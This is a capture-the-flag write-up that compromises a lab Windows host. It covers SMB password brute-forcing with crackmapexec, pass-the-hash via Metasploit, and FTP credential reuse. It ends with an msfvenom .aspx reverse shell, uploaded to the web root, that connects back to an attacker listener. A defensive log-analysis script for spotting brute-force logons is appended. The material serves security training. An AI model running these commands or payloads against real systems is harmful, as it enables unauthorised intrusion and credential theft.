Penetration Testing Exploitation CTF 2

Overview

This lab focuses on exploiting a Windows target machine. By identifying services, analyzing misconfigurations, and leveraging discovered credentials, we uncover and capture the flags. Tasks involve exploiting SMB misconfigurations, utilizing NTLM hashes, and gaining system access.

The target machine is accessible at target.ine.local. The following flags need to be captured:

  1. Flag 1: SMB user tom hasn't changed his password in a long time.
  2. Flag 2: Using the NTLM hash list discovered earlier, compromise SMB user nancy.
  3. Flag 3: The hint found in the previous challenge might be useful.
  4. Flag 4: Compromise the target machine and retrieve C:\flag4.txt.

A useful wordlist:
/usr/share/wordlists/metasploit/unix_passwords.txt


Writeup

Flag 1: Exploiting SMB User tom

Step 1: Port Scanning

First, we perform an Nmap scan to identify open ports and services:

nmap -p- --min-rate=10000 target.ine.local

Findings:
- FTP (21)
- HTTP (80)
- SMB (445)
- RDP (3389)
- Multiple RPC ports (135, 49152-49191)

Step 2: SMB Enumeration

The challenge hints that tom's password is old and therefore likely weak, so we brute-force it with crackmapexec using the provided wordlist:

crackmapexec smb target.ine.local -u tom -p /usr/share/wordlists/metasploit/unix_passwords.txt

Discovered Credentials:
tom:felipe

Step 3: Accessing SMB Shares

Using the credentials, we list available shares:

smbclient -U tom -L \\\\target.ine.local

Accessible Shares:
- HRDocuments
- ITResources

We access HRDocuments and retrieve flag1.txt:

smbclient -U tom \\\\target.ine.local\\HRDocuments
> get flag1.txt

Flag 1

7a4d0be4d00d4278bcfef976d32205e6


Flag 2: Compromising SMB User nancy with NTLM Hashes

Step 1: Extracting NTLM Hashes

Inside HRDocuments, we find leaked-hashes.txt. Each line is user:hash, so we extract only the hash column:

cut -d ":" -f 2 leaked-hashes.txt > hashes.txt

Step 2: Authenticating with the Hashes

Using Metasploit's smb_login, which accepts NTLM hashes in place of passwords, we try each hash from the list against user nancy (this is hash reuse, not cracking):

msf6 > use auxiliary/scanner/smb/smb_login
msf6 > set SMBUser nancy
msf6 > set PASS_FILE hashes.txt
msf6 > set RHOSTS target.ine.local
msf6 > run

Successful Login:
nancy:b3ddea4b4b957f3e037af75cfe5317ad

Step 3: Accessing ITResources

We log in via SMB and retrieve flag2.txt:

smbclient -U nancy \\\\target.ine.local\\ITResources
> get flag2.txt

Flag 2

[Flag 2 Value]


Flag 3: Leveraging the Hint

Step 1: Analyzing the Hint

Inside ITResources, we find hint.txt:

Who knows, these creds might come handy! ---> david:omnitrix_9901

Step 2: FTP Access

We use the credentials to log in via FTP:

ftp target.ine.local
Name: david
Password: omnitrix_9901
> ls
> get flag3.txt

Flag 3

192e2217da974f89ae694e411bc29179


Flag 4: System Compromise & Flag Extraction

Step 1: Uploading a Web Shell

Since the FTP root maps to the IIS web directory (inetpub), anything uploaded over FTP is served by the web server. We generate a .aspx reverse-shell payload and upload it:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.42.2 LPORT=4444 -f aspx > shell.aspx
ftp> put shell.aspx

Step 2: Reverse Shell Execution

We set up a Metasploit listener:

msf6 > use exploit/multi/handler
msf6 > set payload windows/meterpreter/reverse_tcp
msf6 > set LHOST eth1
msf6 > run

Step 3: Retrieving the Final Flag

After gaining a shell, we navigate to C:\ and download flag4.txt:

meterpreter > cd C:\\
meterpreter > download flag4.txt

Flag 4

c7f0a853e2e2499b8bd596e70480fefc

This exercise demonstrated SMB password brute-forcing, NTLM hash reuse (pass-the-hash), credential reuse across services, and an FTP upload into the web root leading to full system compromise.
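From the defender's side, the crackmapexec run against tom (Flag 1, Step 2) and the smb_login hash run against nancy (Flag 2, Step 2) both leave the same trail in the Windows Security log: a burst of failed network logons from one source, then a success. The script below is an added example, not part of the original writeup; it flags that pattern over constructed, simplified event records (the source IP 10.10.42.7 and account alice are made up for contrast).

```python
"""Added example: flag the brute-force-then-success logon pattern that the
crackmapexec password run (tom) and the smb_login hash run (nancy) leave in
the Windows Security log. Records below are constructed, not real exports."""
from collections import defaultdict
from datetime import datetime, timedelta
# Constructed sample: timestamp, event id (4625 fail / 4624 success), account, source IP, logon type.
SAMPLE_EVENTS = """\
2024-05-01T10:00:01 4625 tom 10.10.42.2 3
2024-05-01T10:00:01 4625 tom 10.10.42.2 3
2024-05-01T10:00:02 4625 tom 10.10.42.2 3
2024-05-01T10:00:02 4625 tom 10.10.42.2 3
2024-05-01T10:00:03 4624 tom 10.10.42.2 3
2024-05-01T10:05:00 4625 nancy 10.10.42.2 3
2024-05-01T10:05:00 4625 nancy 10.10.42.2 3
2024-05-01T10:05:01 4625 nancy 10.10.42.2 3
2024-05-01T10:05:02 4624 nancy 10.10.42.2 3
2024-05-01T09:00:00 4625 alice 10.10.42.7 2
2024-05-01T09:30:00 4624 alice 10.10.42.7 2
"""

def parse_events(text):
    """Parse constructed lines into sorted (ts, event_id, user, src, logon_type)."""
    events = []
    for line in text.splitlines():
        if line.strip():
            ts, eid, user, src, ltype = line.split()
            events.append((datetime.fromisoformat(ts), int(eid), user.lower(), src, int(ltype)))
    return sorted(events)

def find_bruteforce_successes(events, threshold=3, window=timedelta(minutes=5)):
    """Return (src, user, failures) for each network (type 3) success preceded by
    at least `threshold` failures from the same source inside `window`."""
    failures = defaultdict(list)  # (src, user) -> timestamps of recent 4625s
    hits = []
    for ts, eid, user, src, ltype in events:
        if ltype != 3:
            continue  # SMB logons are network logons (type 3); skip the rest
        key = (src, user)
        if eid == 4625:
            failures[key].append(ts)
        elif eid == 4624:
            recent = [t for t in failures[key] if ts - t <= window]
            if len(recent) >= threshold:
                hits.append((src, user, len(recent)))
            failures[key].clear()  # one alert per successful break-in
    return hits

if __name__ == "__main__":
    for src, user, n in find_bruteforce_successes(parse_events(SAMPLE_EVENTS)):
        print(f"ALERT {src} logged in as {user} after {n} failures")
```

Tune `threshold` and `window` to the environment's normal failure rate; the interactive (type 2) events for alice are ignored, so ordinary mistyped console passwords do not trigger it.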